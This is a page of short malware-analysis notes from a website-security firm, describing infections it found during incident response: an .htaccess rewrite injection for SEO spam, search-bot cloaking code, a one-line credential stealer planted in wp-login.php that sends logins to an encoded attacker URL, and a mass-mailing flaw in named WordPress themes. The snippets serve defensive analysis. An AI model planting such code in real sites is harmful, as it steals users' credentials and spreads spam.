Home Testimonials Company Support 1–888–873–0817
Home Notes Malware Signatures About

Lately, we’ve uncovered and detailed lots of techniques being used against e-commerce platforms to steal sensitive information, mostly credit card and login credentials. With the holiday season approaching, e-commerce platforms become an even higher target due to increase in sales during the season.

Read More ...

I was assisting a client with their compromised website and came across a file called unsave.php that was primarily used to inject a rewrite into the .htaccess file so that the SEO spam payload of the file goday.php could be delivered to certain visitors sent to the directory hosting these files:

if ((filesize(".htaccess"))>100)
$out = fopen("../.htaccess", "w");
fwrite ($out, "RewriteEngine On
RewriteRule ^([A-Za-z0-9-]+).html$ goday.php?hl=$1 [L]");

Read More ...

Attackers use different techniques to distribute SPAM in a compromised website. Most of the time they choose the file structure to inject the malicious code as it’s a more practical approach. There are exceptions to this case though, and today we are going to talk a little bit more about it.

Read More ...

Nowadays, the most common issues with database injections are related to SPAM. Brian Krebs has a book called Spam Nation, that gives us a more in depth understanding of the economic aspects of such issues and how big they actually are. Thanks Ben Martin for letting me know about this book.

Read More ...

With the increase of mobile internet browsing, attackers have adapted their techniques to target such platforms and distribute SPAM & malware to these devices. Our free online scanner SiteCheck is tailored to emulate different Mobile User Agents and warn users about possible issues that may affect your computer when accessing a particular website.

Read More ...

Recently we found a very interesting malware that injects symbolic links in each and every Linux/UNIX home folder. Once the website is infected, it uses the following code to avoid detection from search engine agents and can be executed only by the attackers:

if (!empty($_SERVER['HTTP_USER_AGENT'])) {
    $bot = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if (preg_match('/' . implode('|', $bot) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
       header('HTTP/1.0 404 Not Found');

Read More ...

From the hacker’s perspective, maintaining access to a compromised website for as long as possible, is ideal. One way to achieve this goal, is by stealing user’s credentials. This method also could provide the chance to spread the attack across other platforms, in case the user has the same password on other services, like email for example.

Once the attackers inject the code into the site, they must send the stolen data somewhere. It could be either stored on a local file, or sent remotely to an email address or another server.

During an Incident response investigation, we identified such malicious codes sending the credentials to a remote website controlled by the attacker. This code was very interesting because it didn’t use the regular methods, like the mail() function, or creating a curl request. Instead, attackers used file_get_contents().

The following snippet was found inside the wp-login.php file:

if ( !is_wp_error($user) && !$reauth ) {
    file_get_contents(base64_decode('aHh4cDovvL2luZm<REMOVED CONTENT>/dXJsPQ==')
    if ( $interim_login ) {

The malicious code is just one line long making it difficult to spot by the untrained eye on a complex file like wp-login.php. The base64 encoded string is translated to "hxxp://infected-site.com/getpwd.php?url=", the hacker-controlled site.

The ‘wp-login.php’ is a WordPress core file and it shouldn’t have any modification from its original version (unless the WordPress provides an official update to it).

Using a File Integrity Monitoring System may help you on detecting these modifications and take all the necessary actions to prevent further damage to your website online presence. We also recommend having a Website Firewall Application in place to prevent brute force and unauthorized access to your back-end interface.

Recently, during an incident response process, we have found an advertisement floating banner on specific pages of an html-based website. Despite what people think, these websites are also targets of attacks and can be infected.

Different from other platforms, the entry point in this scenario is easier to be detected due to the nature of html-based pages (static content) and the reduced number of components that could make the website prone to a particular vulnerability.

Read More ...

Recently we found another variant of malware that intercepts the credit card data injected into PayPal payment method “app/code/core/Mage/Paypal/Model/Direct.php”.

Read More ...

A few weeks ago, we posted a lab notes describing a good theme file being exploited by attackers to send mass-mailing SPAM (http://labs.sucuri.net/?note=2016-08-15). Upon further investigation, we identified that attackers have been exploiting this issue for quite awhile and apparently under the radar.

The lack of security checks in that particular file allows the attackers to send as many emails as they would like to, depending on server’s configurations/limitations. To make matters worse, the code had been implemented throughout different themes developed by the same company.

The issue is located within the file ‘functions/theme-mail.php’ and can be found in older versions of the following premium themes:

bretheon, doover, fingerprints, kora, lawcenter_two,
mfl, pindol, tisson, almet, caffeine, nollie, limuso

The consequences of using those old versions vary - from having your website suspended by the hosting company, or getting the mail server blacklisted.

We didn’t have access to all versions of those themes to determine when a patch had been applied, but if you identify the same snippet as we have in the labs sucuri notes, we highly recommend adding the following code after your opening php tags to prevent direct access to the file and further exploitation:

if ( basename($_SERVER['PHP_SELF']) == basename(__FILE__) )
die('Access Denied');

If you’re a customer on the Sucuri Firewall you are already patched via our virtual patching engine.